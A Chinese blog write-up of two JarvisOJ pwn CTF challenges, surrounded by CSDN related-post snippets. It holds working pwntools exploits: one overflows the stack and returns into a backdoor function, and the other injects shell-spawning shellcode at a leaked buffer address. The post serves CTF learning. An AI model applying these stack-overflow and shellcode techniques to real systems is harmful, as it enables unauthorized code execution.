jarvisOJ Pwn writeup

于 2021-05-10 13:20:40 发布
阅读量114 收藏 1
点赞数 1
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KGYSaikou/article/details/116592784
版权

1.level0

    checksec一下

    

    64位程序,只开启了堆栈不可执行保护

    用IDA打开

    主函数非常简单,输出Hello World以后调用vulnerable_function()函数,并返回该函数的返回值

    

    vulnerable_function()函数内定义了一个字符变量buf,用read函数读取字符(串)到buf中

    

    这里我们可以发现,buf的距离rbp的长度为80h,而read可以读取200h个字符,会造成栈溢出

    在函数列表中发现后门函数callsystem()

    

    所以我们只要构造合适的payload,将vulnerable_function()函数的返回地址改写成callsystem()函数的地址即可

    exp如下:

from pwn import *

context.binary = './level0'
context.log_level = 'debug'
elf = context.binary

io = process("./level0")

payload = flat(cyclic(0x80 + 8) + elf.sym['callsystem'])
io.sendline(payload)
io.interactive()

    运行后得到sh

    

2.level1

    checksec一下

    

    32位程序 几乎没有开启保护

    用IDA打开

    

    很简单的主函数

    vulnerable_function()函数

    

    函数输出了buf变量的地址,之后读取100h的字符

    因为没有开启NX保护,所以可以直接向buf上写入shellcode,之后再跳转到buf的地址就可以执行shellcode

    exp如下:

from pwn import *

context.binary = './level1'
context.log_level = 'debug'
elf = context.binary

io = process('./level1')

io.recvuntil('this:')
buf = int(io.recvuntil('?\n', drop = True), 16)
shellcode = asm(shellcraft.sh())

payload = flat(shellcode, 'a'*(0x88 + 4 - len(shellcode)), buf)

io.sendline(payload)
io.interactive()

    运行后得到sh

    

KGYSaikou
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
jarvisoj刷题之旅】pwn题目Tell Me Something的writeup
iqiqiya的博客
10-14 990
题目信息: file一下  发现是64位的ELF checksec检查下安全性 objdump -t 文件名   可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2029
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
jarvis oj pwn hiphop writeup
charlie_heng的专栏
01-24 362
这题真的感觉挺新颖的 首先说下这题的漏洞是什么 条件竞争! 一开始我看到这题是懵逼的,为什么好像常规的下标越界,缓冲区越界之类的都没有 然后其中一个功能又非常奇怪,要开线程? 然后看到这个函数里面某个地方一大堆sleep,于是就猜是条件竞争了 这题是打boss,然后每次都会随机一下出招,只要能预测出出招是什么就能防御 然后回想起以前打pwnable的一题,也是同样靠本地的时间与服务器
jarvisOJ)(pwn)level6_x86
PLpa的博客
08-05 427
Unlink!Unlink!Unlink! level6_x86作为一道堆溢出入门题,还是值得用来练练手,学习一下堆的基础的知识的。 参考文献: ctf-wiki:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/unlink-zh/ 大佬博客:https://blog.csdn.net/weixin_41617275/article...
cgpwn2 writeup
ditto的博客
01-07 1713
拿到题目检查防护: 简单运行下: 放到ida里看下: hello函数的代码如下: char *hello() { char *v0; // eax signed int v1; // ebx unsigned int v2; // ecx char *v3; // eax char s; // [esp+12h] [ebp-26h] int v6; // [esp+1...
Writeup of level3(Pwn) in JarvisOJ
cossack9989的博客
02-14 1540
又拾起了被我搁在一边快一个月的Pwn……(这一个月我被Android逆向拐跑了?) 不扯了,看题。 0x00 checksec 拿到文件先查checksec,得到如下信息: root@kali:~/Desktop/Pwn/level3# checksec level3 [*] '/root/Desktop/Pwn/level3/level3' Arch: i386-32-l
JarvisOJ Web&Reverse&Pwn
热门推荐
4ct10n
11-16 5万+
Web 0x01 phpinfo 0x02 WEB 0x03 Easy Gallery 0x04 Login 0x05 PORT51 0x06 LOCALHOST 0x07 神盾局的秘密 0x08 IN A Mess 0x09 api调用 0x0a Simple Injection 0x0b 图片上传漏洞 0x0c chopper 0x0b flag在管理员手里 Reverse 0x01FindK
jarvisoj pwn level6 writeup
charlie_heng的专栏
01-21 1717
考完试了,又开始做题 这题是一道很好的用来熟悉堆的题 首先先确定漏洞的地方是delete note 漏洞有两个 1. 没有校验对应的堆是否有free 2. delete完之后没有把指向堆的指针清除 所以可以利用double free,触发unlink,达到任意内存修改的目的 具体怎么利用在https://www.cnblogs.com/0xJDchen/p/6195919.html
Jarvis OJ PWN题解 持续更新~
qq_41071646的博客
03-28 1090
最近沉(被)迷(迫)学pwn 看我们的志琦大佬 我就知道 pwn 玩玩就行 但是 不认真学 不行 然后向大佬打听了几个pwn的平台网站 打算 玩一下 这里找到了Jarvis OJ 然后我 是看那个 做出来的人多 我就做那个·~~~~~~~ 不定期的更新 Tell Me Something 然后这个这道题 其实很简单 栈溢出 没有任何防护 就防护了 ...
Writeup of level4(Pwn) in JarvisOJ
cossack9989的博客
02-16 1269
大年初一浅浅地学了个leak?0x00 What is DynELF?pwntool-DynELF详见官方文档咯~0x01 checksecroot@kali:~/Desktop/Pwn/level4# checksec level4 [*] '/root/Desktop/Pwn/level4/level4' Arch: i386-32-little RELRO: P...
18.9.18 Jarvis OJ PWN----[XMAN]level2
qq_42192672的博客
09-18 211
先检测文件 我们可以看到没有栈保护,可以利用栈溢出 拖进IDA 先是一个vulnerable_function函数,同时在函数列表中我们可以看到有system函数,我们可以把returnaddress牵引到system函数上,执行/bin/sh语句 buf的偏移量是0x88个字节,花0x04个字节覆盖ebp,然后伪造returnsddress跳转到system,再加上用来给syst...
财务收支管理系统(带对账)Excel模板
07-16
【作品名称】:财务收支管理系统(带对账)Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
人工智能机器学习基础非线性回归
07-16
使用python实现机器学习基础非线性回归
Python编程惯例.md
07-16
python安装
传感器习题集.doc
07-16
传感器
无线多媒体传感器网络论文:基于无线多媒体传感器网络的图像分布式处理技术的研究.doc
07-16
传感器
历年美国总统数据1789-2025年.xlsx
最新发布
07-16
样例数据及详细介绍:https://blog.csdn.net/T0620514/article/details/140477245
中钢集团武汉安全环保研究院考研,41个专业课历年考试真题及答案汇总,备考资料题库笔记,录用名单汇总.pdf
07-16
中钢集团武汉安全环保研究院考研,41个专业课历年考试真题及答案汇总,备考资料题库笔记,录用名单汇总.pdf
实时更新Visual Studio Code工具与浏览器HTML修改同步更新-live-server的使用
07-16
实时更新Visual Studio Code工具与浏览器HTML修改同步更新_live_server的使用
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值